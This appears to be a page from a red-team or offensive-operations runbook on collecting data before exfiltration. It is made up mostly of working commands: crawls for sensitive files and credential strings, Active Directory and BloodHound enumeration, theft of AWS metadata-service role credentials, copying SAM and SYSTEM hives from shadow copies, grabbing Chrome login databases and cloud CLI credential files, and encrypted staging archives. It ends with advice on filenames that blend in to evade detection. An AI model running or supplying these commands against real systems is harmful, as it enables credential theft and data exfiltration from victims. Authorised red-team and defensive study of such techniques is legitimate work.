Collection techniques¶
Before exfiltrating data, attackers consolidate and stage it. Effective collection is methodical: understand the environment, identify what is worth taking, and gather it with minimal noise.
Automated data discovery¶
Attackers crawl for high-value files using either built-in tooling or custom scripts. Common targets: financial records, intellectual property, HR data, credentials, configuration files, and private keys.
# PowerShell: find Office documents, PDFs, and config files
Get-ChildItem -Path C:\Users -Recurse -Include *.docx,*.xlsx,*.pdf,*.json,*.xml,*.config `
-ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt 50MB } |
Select-Object FullName, Length, LastWriteTime |
Export-Csv -Path C:\Temp\filelist.csv -NoTypeInformation
# Linux: find recently modified sensitive files
find /home /etc /var/www -type f \( -name "*.conf" -o -name "*.key" -o -name "*.pem" \
-o -name "*.csv" -o -name "*.sql" \) -newer /etc/passwd 2>/dev/null
For keyword-based discovery within documents, use native indexing or grep-style tools:
# search for credential patterns in text files
grep -rli "password\|secret\|api_key\|token\|BEGIN.*PRIVATE" /home /etc 2>/dev/null
Network and environment mapping¶
Attackers map the internal network before lateral movement or collection; knowing what exists is a prerequisite to knowing what to take.
# Active Directory: enumerate users, computers, and last logon
Get-ADComputer -Filter * | Select-Object Name, DNSHostName, OperatingSystem
Get-ADUser -Filter * -Properties LastLogonDate | Select-Object SamAccountName, LastLogonDate
# BloodHound: ingest AD data via SharpHound for attack path analysis
.\SharpHound.exe -c All --outputdirectory C:\Temp\
# results in C:\Temp\*.json: import into BloodHound
On instances where IMDSv1 is still enabled, the cloud instance metadata service provides credentials for the attached IAM role without any authentication (IMDSv2 requires fetching a session token first):
# AWS instance metadata (accessible from any process on the instance)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
Credential harvesting¶
LSASS memory¶
Extracting credentials from LSASS requires local admin or SYSTEM. Modern environments increasingly run Credential Guard, which isolates NTLM hashes and Kerberos-derived keys in a virtualization-protected process so they cannot be dumped from LSASS memory; where it is absent, hashes and tickets remain accessible.
These techniques are covered in detail in the credential harvesting runbook.
SAM database¶
The SAM database contains local account hashes. Offline extraction from a volume shadow copy avoids the lock on the live hive files:
# copy SAM and SYSTEM hives from a shadow copy (the live files are locked)
vssadmin list shadows
$shadow = '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
cmd /c "copy $shadow\Windows\System32\config\SAM C:\Temp\SAM"
cmd /c "copy $shadow\Windows\System32\config\SYSTEM C:\Temp\SYSTEM"
# extract hashes offline with secretsdump.py or similar
Browser credential stores¶
Browsers store saved credentials in encrypted databases. Extraction requires running as the target user (DPAPI context):
# Chrome login data
$src = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
Copy-Item $src C:\Temp\chrome_login.db
# extract with a tool that handles DPAPI decryption
Cloud CLI credential files¶
# check for stored cloud credentials (plaintext or DPAPI-encrypted)
$paths = @(
"$env:USERPROFILE\.aws\credentials",
"$env:USERPROFILE\.azure\accessTokens.json",
"$env:APPDATA\gcloud\credentials.db"
)
$paths | Where-Object { Test-Path $_ } | ForEach-Object { Write-Output "Found: $_" }
SaaS and cloud collection¶
Once an identity is controlled, collection from SaaS platforms uses the platform’s own APIs. This is covered in the SaaS harvesting runbook.
Staging before exfiltration¶
Collected data needs to be staged: compressed, optionally encrypted, and placed somewhere from which it can be exfiltrated without leaving a trail of individual file accesses:
# compress a staged collection to a temp directory
Compress-Archive -Path C:\Temp\collected -DestinationPath C:\Temp\out.zip
# Linux: archive and optionally encrypt
tar czf /tmp/staged.tgz /tmp/collected/
# or with encryption:
tar czf - /tmp/collected/ | openssl enc -aes-256-cbc -pass pass:KEY -out /tmp/staged.enc
Use paths and filenames that blend into the environment: C:\Windows\Temp\,
/tmp/, and filenames matching legitimate system activity.